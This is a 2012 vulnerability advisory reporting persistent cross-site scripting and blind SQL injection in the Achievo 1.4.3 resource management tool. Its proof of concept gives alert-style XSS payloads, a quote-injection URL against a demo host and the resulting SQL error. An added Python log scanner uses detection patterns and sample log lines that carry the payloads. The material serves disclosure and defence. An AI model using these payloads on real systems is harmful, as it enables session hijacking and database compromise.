Title:
======
Achievo v1.4.3 - Multiple Web Vulnerabilities


Date:
=====
2012-01-30


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=403


VL-ID:
=====
403


Introduction:
=============
Achievo is a flexible web-based resource management tool for business environments.
Achievo's resource management capabilities will enable organisations to support their business
processes in a simple, but effective manner.

A solution that fits seamlessly to the wishes of every organisation and offers the possibility
and freedom to adapt the functionality to the needs of the organisation. It will fit into every
organisation because Achievo is extremely easy to change to your specific situation.

(Copy of the Vendor Website: http://www.achievo.nl/product/ )


Abstract:
=========
Vulnerability-Lab Team (Chokri B.A.) discovered Multiple Web Vulnerabilities on the resource management tool Achievo v1.4.3.


Report-Timeline:
================
2012-01-30: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
Multiple persistent cross-site scripting vulnerabilities and a blind SQL injection vulnerability have been detected in the resource management tool Achievo v1.4.3.
The bugs allow a remote attacker to inject malicious script code on the application side and/or to execute SQL commands via a
remote SQL injection attack.
Successful exploitation of the vulnerabilities allows an attacker to manipulate specific modules and can
lead to session hijacking (user/mod/admin) and/or to compromise the application and DBMS.


Vulnerable Module(s):
[+] Users preferences
[+] Projects
[+] Download vcard ( SQLi )

Picture(s):
../1.jpg
../2.jpg


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with low required user interaction. For demonstration or to reproduce ...

1.
<select class="atkManyToOneRelation" name="atksearch_AE_coordinator_AE_coordinator[]"><option value="">Search all
</option><option value="__NONE__">Nothing selected</option><option value="1
" >"><img src=image.jpg onerror=alert(123); /> [X]
, test (manager)</option><option value="2" >

2.
<td valign="top" class="fieldlabel"><b>Project:</b> </td>
<td valign="top" class="field" >
"><img src: "><img src=image.jpg onerror=alert(1234); /> [X]
</td></tr>

3.
http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcard&atklevel=1&atkprevlevel=0&atkstackid=4f2467eae0518&id=3'

Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1).
Halted
error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1)
Halted...


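Both vectors in the Details and Proof of Concept sections leave a trace in the web server access log: a non-integer id sent to the dispatch.php vcard action (the blind SQL injection probe) and HTML tags or inline event handlers submitted through the Users preferences and Projects forms (the persistent XSS payloads). The following detection script is an added example, not code from the advisory or from Achievo; the Apache-style log format, the /achievo/ path and the project-form parameter names are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (placeholder IPs, not real traffic).
# Line 2 carries the vcard id probe shown in the advisory (id=3'), line 3 a stored-XSS payload.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jan/2012:10:00:01 +0000] "GET /achievo/dispatch.php?atkaction=vcard&atklevel=1&id=3 HTTP/1.1" 200 812
10.0.0.5 - - [30/Jan/2012:10:00:02 +0000] "GET /achievo/dispatch.php?atkaction=vcard&atklevel=1&id=3%27 HTTP/1.1" 500 1402
10.0.0.9 - - [30/Jan/2012:10:00:03 +0000] "GET /achievo/dispatch.php?atknodetype=project.project&atkaction=save&name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 302 0
10.0.0.7 - - [30/Jan/2012:10:00:04 +0000] "GET /achievo/index.php HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')
# HTML tags and inline event handlers of the kind used in the advisory's payloads.
XSS_RE = re.compile(r'<\s*(?:img|script|svg|iframe)\b|\bon\w+\s*=', re.IGNORECASE)

def classify(line):
    """Return (client_ip, findings) for one log line, or None if it is not suspicious.

    findings is a list drawn from 'sqli-probe' (non-integer id sent to the vcard
    action) and 'xss-payload' (tag or event handler in any query parameter).
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('url'))
    params = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded here
    findings = []
    # ATK record ids are integers; a quote or anything else in id is a probe of the SQLi.
    if url.path.endswith('dispatch.php') and params.get('atkaction') == ['vcard']:
        if any(not v.isdigit() for v in params.get('id', [])):
            findings.append('sqli-probe')
    if any(XSS_RE.search(v) for values in params.values() for v in values):
        findings.append('xss-payload')
    return (m.group('ip'), findings) if findings else None

def scan(log_text):
    """Run classify over every line; returns the suspicious (ip, findings) pairs in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```

Only GET parameters are inspected because the access log does not record POST bodies; a 500 response on the vcard action, as in the second sample line, is the server-side sign of the error the advisory reproduces.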
Risk:
=====
1.1
The security risk of the persistent XSS vulnerabilities is estimated as medium(+).

1.2
The security risk of the blind SQL injection vulnerability is estimated as high(+).


Credits:
========
Vulnerability Research Laboratory - Chokri B.A (Me!ster)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab


--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com